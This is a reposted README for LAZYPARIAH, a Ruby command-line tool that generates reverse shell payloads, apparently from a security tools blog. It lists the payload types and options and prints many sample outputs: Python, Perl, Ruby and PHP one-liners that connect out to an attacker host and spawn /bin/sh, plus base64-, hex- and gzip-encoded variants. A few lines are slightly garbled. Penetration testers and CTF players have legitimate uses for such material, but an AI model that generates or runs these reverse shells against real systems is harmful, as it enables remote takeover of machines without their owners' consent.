LAZYPARIAH - A Tool For Generating Reverse Shell Payloads On The Fly

A low-dependency command-line tool for generating reverse shell payloads on the fly.


LAZYPARIAH is a simple and easily installable command-line tool written in pure Ruby that can be used during penetration tests and capture-the-flag (CTF) competitions to generate a range of reverse shell payloads on the fly.

The reverse shell payloads that LAZYPARIAH supports include (but are not limited to):

  • C binary payloads (compiled on the fly): c_binary
  • Ruby payloads: ruby, ruby_b64, ruby_hex, ruby_c
  • Powershell payloads: powershell_c, powershell_b64
  • Base64-encoded Python payloads: python_b64
  • Rust binary payloads (compiled on the fly): rust_binary
  • PHP scripts containing base64-encoded Python payloads called via the system() function: php_system_python_b64
  • Java classes (compiled on the fly): java_class
  • Perl payloads: perl, perl_b64, perl_hex, perl_c
  • Simple PHP payloads (targeting specific file descriptors): php_fd, php_fd_c, php_fd_tags


This tool is intended to be used only in authorised circumstances by qualified penetration testers, security researchers and red team professionals. Before downloading, installing or using this tool, ensure that you understand the relevant laws in your jurisdiction. The author of this tool does not endorse, encourage or condone the use of this tool for illegal or unauthorised purposes.


  • Ruby >= 2.7.1 (LAZYPARIAH has not been tested on previous versions of Ruby)
  • OpenJDK (Optional: Only required for java_class payloads.)
  • GCC (Optional: Only required for c_binary payloads.)
  • Rust (Optional: Only required for rust_binary payloads.)


LAZYPARIAH can be installed on most GNU/Linux and BSD systems using the RubyGems installer as follows:

gem install lazypariah


Usage:	lazypariah [OPTIONS] <PAYLOAD TYPE> <ATTACKER HOST> <ATTACKER PORT>Note:	<ATTACKER HOST> may be an IPv4 address, IPv6 address or hostname.Example:	lazypariah -u python_b64 1555Example:	lazypariah python_c malicious.local 1337Valid Payloads:    awk    bash_tcp    c_binary    java_class    nc    nc_openbsd    nc_pipe    nodejs    nodejs_b64    nodejs_c    nodejs_hex    perl    perl_b64    perl_c    perl_hex    php_fd    php_fd_c    php_fd_tags    php_system_python_b64    php_system_python_hex    php_system_python_ipv6_b64    php_system_python_ipv6_hex    powershell_b64    powershell_c    python    python_b64    python_c    pyth   on_hex    python_ipv6    python_ipv6_b64    python_ipv6_c    python_ipv6_hex    ruby    ruby_b64    ruby_c    ruby_hex    rust_binary    socatValid Options:    -h, --help                       Display help text and exit.    -l, --license                    Display license information and exit.    -u, --url                        URL-encode the payload.    -v, --version                    Display version information and exit.    -D, --fd INTEGER                 Specify the file descriptor used by the target for TCP. Required for certain payloads.    -P, --pv INTEGER                 Specify Python version for payload. Must be either 2 or 3. By default, no version is specified.    -N, --no-new-line                Do not append a new-line character to the end of the payload.        --b64                        Encode a c_binary, rust_binary or java_class payload in base-64.        --   hex                        Encode a c_binary, rust_binary or java_class payload in hexadecimal.        --gzip                       Compress a c_binary, rust_binary or java_class payload using zlib.        --gzip_b64                   Compress a c_binary, rust_binary or java_class payload using zlib and encode the result in base-64.        --gzip_hex                   Compress a c_binary, rust_binary or java_class payload using zlib and encode the result in hexadecimal.

Further Notes and Examples

The payloads listed above are more-or-less systematically named.

Payloads ending with _c are intended to be executed from within a shell session. These payloads execute code directly using the relevant interpreter (e.g. python3 -c or ruby -e).

For example, the command lazypariah python_c 1337 should produce the following output:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);'

The command lazypariah python 1337, on the other hand, should simply produce a block of Python code which could potentially be placed in a .py file:

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);

Generally speaking, selecting payloads ending with _b64 should produce a command intended to be run from within a shell session in a similar manner to payloads ending with _c, but the commands will be different in structure. These commands will essentially pipe a base64-encoded block of code through to base64 -d and then on through to the relevant interpreter (such as python3, python2 or ruby).

For example, the command lazypariah python_b64 1337 should produce the following output:

echo aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjEwLjEwLjE0LjQiLDEzMzcpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTsgb3MuZHVwMihzLmZpbGVubygpLDIpO3A9c3VicHJvY2Vzcy5jYWxsKFsiL2Jpbi9zaCIsIi1pIl0pOw== | base64 -d | python

The exception to this is powershell_b64, which uses Powershell's inbuilt base64 decoder. The command lazypariah powershell_b64 1337, for instance, should return the following:


(Note: The length of the above payload is due to the fact that Powershell uses UTF-16LE encoding, where a single character corresponds to two bytes.)

These types of payloads can be useful in certain situations because they do not include any single or double quotes.

In a similar manner, selecting payloads ending with _hex will produce a command that pipes a hexadecimal-encoded block of code through to xxd -p -r - and then on through to the relevant interpreter. For example, lazypariah perl_hex 1337 should produce the following output:

echo 75736520536f636b65743b24693d2231302e31302e31342e34223b24703d313333373b736f636b657428532c50465f494e45542c534f434b5f53545245414d2c67657470726f746f62796e616d6528227463702229293b696628636f6e6e65637428532c736f636b616464725f696e2824702c696e65745f61746f6e282469292929297b6f70656e28535444494e2c223e265322293b6f70656e285354444f55542c223e265322293b6f70656e285354444552522c223e265322293b6578656328222f62696e2f7368202d6922293b7d3b | xxd -p -r - | perl

Compiled payloads (c_binary, java_class and rust_binary) have optional command-line arguments for zlib compression (--gzip), base64-encoding (--b64) and hexadecimal-encoding (--hex).

For example, the command lazypariah --b64 java_class 1337 should produce the following output:


It is also possible to perform zlib compression on one of the aforementioned compiled payloads before encoding it in either base64 or hexadecimal using the --gzip_b64 and --gzip_hex command-line arguments respectively. For example, the command lazypariah --gzip_hex java_class 1337 should produce the following output:

1f8b08003ca25960000375535d57125114dd83335ca0511431a53433b5f00bb42c13cc4ad3c2f0a3200dcd5a03dc741419d7cc50f6577ca8b57cf1b55eb095ab7e403fa6d52fc8ce0549c91aee6cced9779f7bce9939f3fdd7976f0046f0ca8336f430f432f4b9d0ef810303024202c20c832e0c79e0c2750f3a7143c0b0704bd64d6195e096075d181170db836e8c0a8828285f141ac59808b8c3302efeef8a987b0cf719262438c7f4bc6e8f4ba809f62c4a90278d2c97e08deb793e57d84a7333a9a573c4d4266c2db339ab6d977c864986070c53123c533b19be6deb46de22276114cc0c9fd6450833add086f646537109ed125a841dce69f9b5f0826964b8654d14f45c969b12ea4fb612b6a9e7d728389cd6f3616b5d044fab7888472a6298a1d24ada3cb7c30923b3c96d4a3a3418126b38342cd48f55c431ab624ec03c16543cc153150924553c13b0882515cfd1ce9052b18c15152f9094d07852c49f9654aca25dc54b51bfc3b4aa2a9d4f6ff00ca56f38d357e52cdd08c7f2db059b7ae2da96047f859d2fd8a7e8f3c195f8df0f202a5e46a3c9b3ba4949a64cd3302bf2b6e0724ffc7fcf322a41b16ccda4ba9a82ff904545bab3d962225ddd1ab7abea6dae9c50dd48b42cad2aca4b4475572da7824fef50b44bb7267386c5b3a5a95b96e0269d9e2b0f1a   31319a4392d2b6f2d6d46d22e560a942e575ae60ad57bd85e4fab1d2ca71be2d943342e9e63bbabda8e50a620eb3dcb24de31d8932222d3ad04adf9db824fad170d2d776593870c24decc7de03488770a4e4afa849d5f8e4c40114b90867112c7e0857cae76e50460fe099ed2be2dc1c811a91fb8ba88d2864d7459c647b238cb07e17ab034534bc8737c0c8f015d1b87ff4332097b8fa00135699fc11508e49a7b02a242bc21fa0c47e3f9a3ea399ce6f59da872be2da3fda23e70225b9f8894adfc507ec21409d7440f42195babb42d80b768469b8185a193a9930ba2aab9b16a97d7eff124340c655d2cb1417a0fb1ad90e047f03b0d0dc15ad040000

Some payloads require the user to specify the file descriptor used by the target for TCP connections. One example of such a payload is php_fd_tags, which is a simple PHP payload enclosed within PHP tags (<?php and ?>) that targets a specific file descriptor.

To specify a target file descriptor, the user must use the command line argument -D INTEGER or --fd INTEGER. For example, to generate a php_fd_tags payload that targets file descriptor 5, the following command can be used: lazypariah -D 5 php_fd_tags 1337

The resulting payload should be as follows: <?php $sock=fsockopen("",1337);exec("/bin/sh -i <&5 >&5 2>&5");?>

Below are some examples of commands and their respective outputs.

Output of command lazypariah -P 3 -u python_b64 1337:


Output of command lazypariah -P 2 python_c 1337:

python2 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);'

Output of command lazypariah -D 3 php_fd_tags 1337:

<?php $sock=fsockopen("",1337);exec("/bin/sh -i <&3 >&3 2>&3");?>

Output of command lazypariah ruby 1337:

require "socket";exit if fork;"","1337");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print}end


Copyright (C) 2020-2021 Peter Bruce Funnell


This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program. If not, see


If you found this project useful and would like to encourage me to continue making open source software, please consider making a donation via the following link:

Donations in Bitcoin (BTC) are also very welcome. My BTC wallet address is as follows:


LAZYPARIAH - A Tool For Generating Reverse Shell Payloads On The Fly LAZYPARIAH - A Tool For Generating Reverse Shell Payloads On The Fly Reviewed by Anónimo on 17:34 Rating: 5